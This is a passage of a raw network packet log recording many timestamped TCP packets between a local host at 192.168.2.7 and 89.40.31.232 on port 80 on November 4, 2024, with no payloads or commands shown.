                                                              Nov 4, 2024 09:27:59.010250092 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010257959 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.010262966 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010276079 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010277033 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.010289907 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010304928 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010310888 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.010333061 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.010341883 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.010452032 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010462999 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010473013 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010490894 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010502100 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.010503054 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010519028 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010529041 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.010530949 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010544062 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010546923 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.010555983 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010575056 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.010602951 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.010603905 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010617971 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010628939 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010656118 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.010656118 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.010651112 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010672092 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010682106 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010694027 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010701895 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.010708094 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010725975 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.010761023 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.010798931 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010855913 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.010890961 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010904074 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010914087 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010926962 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010938883 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010946989 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.010951042 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010965109 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010973930 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.010977030 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.010986090 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.010991096 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011003017 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011013985 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.011048079 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.011167049 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011178970 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011190891 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011219978 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.011230946 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.011261940 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011275053 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011285067 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011298895 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011322021 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.011356115 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.011379957 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011392117 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011404037 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011415958 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011425018 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.011464119 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.011464119 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.011496067 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011507988 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011518955 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011533022 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011554003 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.011564016 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.011579037 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011590958 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011600971 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011612892 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011627913 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.011642933 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.011670113 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.011693954 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011707067 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011718988 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011730909 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011738062 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.011743069 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011765957 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.011785984 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.011810064 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011826992 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011837959 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011863947 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.011887074 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.011910915 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011924028 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011934996 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011946917 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.011960983 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.011987925 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.012057066 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.012067080 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.012116909 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.012131929 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.012141943 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.012151957 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.012164116 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.012176991 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.012182951 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.012192011 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.012196064 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.012208939 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.012219906 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.012248993 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.012265921 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.012279034 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.012290955 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.012303114 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.012314081 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.012321949 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.012331963 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.012423992 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.013417006 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.013446093 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.013500929 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.013509035 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.013528109 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.013540030 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.013551950 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.013561010 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.013580084 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.013586998 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.013598919 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.013608932 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.013611078 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.013627052 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.013653040 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.014065981 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.014106989 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.014118910 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.014118910 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.014163971 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.014163971 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.014189005 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.014202118 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.014211893 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.014224052 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.014235020 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.014240026 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.014266968 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.014300108 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.014312983 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.014323950 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.014336109 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.014345884 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.014348984 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.014359951 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.014384031 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.014409065 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.014420986 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.014429092 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.014437914 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.014457941 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.014476061 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.014497042 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.014508963 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.014525890 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.014538050 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.014552116 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.014555931 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.014566898 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.014575958 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.014580011 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.014601946 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.014619112 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.014621019 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.014633894 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.014653921 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.014667034 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.014678955 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.014702082 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.042356014 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.042383909 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.042399883 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.042412996 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.042424917 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.042438030 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.042438984 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.042474985 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.086762905 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.086781025 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.086802006 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.086815119 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.086826086 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.086839914 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.086889029 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.086931944 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.086947918 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.086960077 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.086972952 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.087004900 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.107388973 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.107414961 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.107434988 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.107453108 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.107467890 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.107477903 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.107491970 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.107505083 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.107517004 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.107538939 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.107578993 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.107656002 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.107676983 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.107690096 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.107722044 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.107738972 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.107769012 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.107781887 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.107793093 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.107820034 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.107850075 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.107875109 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.107886076 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.107906103 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.107917070 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.107927084 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.107929945 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.107944012 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.107968092 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.107990026 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108005047 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.108019114 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108030081 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108031034 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.108061075 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.108068943 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.108079910 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108093023 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108104944 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108115911 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108136892 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.108164072 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.108177900 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108189106 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108249903 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.108268023 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108278990 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108290911 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108304977 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108314037 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.108316898 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108326912 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.108359098 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.108367920 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108381033 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108391047 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108413935 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.108428955 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.108453989 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108465910 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108479023 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108490944 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108505011 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.108539104 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.108565092 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108577013 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108607054 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.108645916 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108664989 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108675957 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108688116 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108700037 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108707905 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.108711958 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108727932 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.108753920 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.108779907 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108792067 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108803988 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108822107 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.108863115 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.108887911 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108900070 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108911037 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108922005 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108928919 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.108936071 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108948946 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.108954906 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.108993053 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.109005928 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.109026909 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.109039068 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.109050035 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.109072924 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.109119892 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.109149933 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.109162092 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.109174967 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.109185934 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.109198093 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.109203100 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.109211922 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.109225988 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.109234095 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.109236002 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.109272003 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.109302044 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.109724045 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.109776020 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.109788895 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.109803915 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.109817028 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.109818935 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.109846115 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.109867096 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.109869957 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.109896898 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.109909058 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.109936953 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.109960079 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.124778032 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.124804020 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.124816895 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.124831915 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.124860048 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.124880075 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.124898911 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.124906063 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.124912977 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.124979019 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.124989986 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125004053 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125016928 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125031948 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125044107 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125045061 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.125065088 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.125078917 CET4993280192.168.2.789.40.31.232
                                                              Nov 4, 2024 09:27:59.125185013 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125200987 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125214100 CET804993289.40.31.232192.168.2.7
                                                              Nov 4, 2024 09:27:59.125225067 CET804993289.40.31.232192.168.2.7
